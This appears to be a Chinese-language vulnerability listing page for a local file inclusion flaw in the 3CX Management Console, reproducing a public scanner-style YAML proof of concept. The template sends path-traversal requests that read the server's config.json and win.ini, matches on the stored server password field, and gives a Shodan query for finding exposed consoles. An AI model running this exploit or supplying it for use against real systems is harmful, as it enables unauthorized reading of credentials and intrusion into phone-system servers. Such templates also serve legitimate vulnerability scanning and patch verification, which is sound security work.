3cx-management-console: 3CX Management Console - Local File Inclusion

日期: 2025-08-01 | 影响软件: 3CX Management Console | POC: 已公开

漏洞描述

3CX Management Console is vulnerable to local file inclusion.

PoC代码[已公开]

id: 3cx-management-console

info:
  name: 3CX Management Console - Local File Inclusion
  author: random-robbie
  severity: high
  description: 3CX Management Console is vulnerable to local file inclusion.
  reference:
    - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
    cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    shodan-query: http.title:"3CX Phone System Management Console"
    product: 3cx
    vendor: 3cx
  tags: 3cx,lfi,voip,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
      - '{{BaseURL}}/Electron/download/windows/\windows\win.ini'

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "CfgServerPassword"
          - "CfgServerAppName"
        condition: and

      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100e9600172dabd75df836973a302e3b2dc013fb5bd9d1d90a129d654e9eea3343e022073ec866098d034dcdede6a4880d2ed995cb3341cc6eae6c00059a8267effb0ad:922c64590222798bb761d5b6d8e72950

相关漏洞推荐